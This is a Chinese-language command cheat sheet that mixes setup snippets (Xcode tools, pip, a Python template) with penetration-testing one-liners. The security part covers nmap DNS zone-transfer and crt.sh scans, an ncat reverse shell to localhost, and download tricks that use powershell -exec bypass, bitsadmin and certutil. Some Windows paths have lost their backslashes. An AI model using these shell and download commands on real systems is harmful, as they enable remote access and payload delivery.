在基于 Intel 的 Mac 上,您可以在启动时使用 Option-Command-R 来升级到与您的 Mac 兼容的最新版 macOS 。
Command Line Tools (CLT) for Xcode
xcode-select --install
更新 pip 和 setuptools 软件包
python -m pip install --no-cache-dir --upgrade pip setuptools
从 pip 缓存中删除所有项目
python -m pip cache purge
安装 Ncat 软件包
sudo apt install ncat # Debian
sudo yum install nmap-ncat # Redhat
利用 NSE 脚本检测域传送和证书透明度滥用问题
nslookup -type=NS <domain> <server>
nmap -p 53 --script dns-zone-transfer --script-args domain=<domain> <server> -oN <server>_dns_zone_transfer.nmap
nmap -sn -Pn --script hostmap-crtsh <domain> -oN <domain>_hostmap_crtsh.nmap
使用 Ncat 反弹交互式 Shell
ncat -l -n -v -p 31337
# Linux
ncat -e /bin/sh 127.0.0.1 31337
# Windows
ncat -e C:Windowssystem32cmd.exe 127.0.0.1 31337
Python 2 下载文件
python -c "with open('/tmp/screenshot.png', 'wb') as f: import urllib2; f.write(urllib2.urlopen('http://sqlmap.org/images/screenshot.png').read())"
Windows 命令行下载文件
powershell -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://sqlmap.org/images/screenshot.png', './screenshot.png')
bitsadmin /transfer d http://sqlmap.org/images/screenshot.png C: mpscreenshot.png
certutil -urlcache -split -f http://sqlmap.org/images/screenshot.png
Python Script Template
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
def main():
pass
if __name__ == '__main__':
main()